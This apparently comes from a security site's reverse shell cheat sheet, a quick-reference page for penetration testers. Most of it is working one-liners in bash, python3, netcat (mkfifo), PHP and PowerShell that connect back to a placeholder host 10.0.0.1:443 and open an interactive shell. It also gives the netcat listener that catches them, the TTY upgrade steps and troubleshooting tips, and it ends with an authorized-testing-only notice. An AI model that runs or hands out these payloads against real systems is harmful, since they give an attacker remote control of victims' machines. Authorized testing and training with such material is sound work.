Reverse Shell Cheat Sheet: One-Liners, Listener, and Upgrade
A quick-reference reverse shell cheat sheet — bash, python, php, powershell and netcat one-liners, the listener to catch them, and the TTY upgrade — with links to the full guide for each.
A reverse shell cheat sheet is only useful if it is correct and you understand what each line does. This is the short version — the one-liners you reach for most, the listener that catches them, and the upgrade that makes the shell usable. Each section links to the full guide if a payload misbehaves. Replace 10.0.0.1 with your LHOST and 443 with your LPORT throughout; or skip the copy-paste and use the reverse shell generator, which fills both in and pairs each payload with its listener.
New to the concept? Start with what is a reverse shell.
1. Start Your Listener First
Always be listening before you fire the payload:
nc -lvnp 443
Use ncat -lvnp 443 --ssl if your payload uses TLS. Listener details and when to upgrade past nc: choosing a listener.
2. The One-Liners
Bash (needs bash, not sh — full guide: bash reverse shells):
bash -i >& /dev/tcp/10.0.0.1/443 0>&1
Python (mind python vs python3 — full guide: python reverse shells):
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",443));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("/bin/bash")'
Netcat when -e is missing (full guide: netcat reverse shells):
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 443 > /tmp/f
PHP for a compromised web app (full guide: php reverse shells):
php -r '$sock=fsockopen("10.0.0.1",443);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell on Windows (full guide: powershell reverse shells, windows reverse shells):
$c=New-Object System.Net.Sockets.TCPClient("10.0.0.1",443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$w=([Text.Encoding]::ASCII).GetBytes($o);$s.Write($w,0,$w.Length);$s.Flush()}
3. Upgrade to a Real TTY
Your first shell is raw — no job control, no sudo, no tab completion. Upgrade it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then: Ctrl-Z
stty raw -echo; fg
# then in the shell: export TERM=xterm
Why each step matters: upgrading a reverse shell.
4. When Nothing Connects
Work the list in order: wrong interpreter → quoting mangled in transit → egress filtered (try 443/80) → listener mismatch. The full diagnostic walkthrough is why reverse shells fail, and quoting specifically is payload quoting.
5. Clean Up
An engagement is not done until the artifacts are gone — fifos, dropped binaries, listeners, modified files. See authorized testing cleanup.
Authorized Testing Only
Every line here is for systems you own or are explicitly authorized to test. The payloads are identical whether the work is sanctioned or not; only your authorization makes using them legitimate.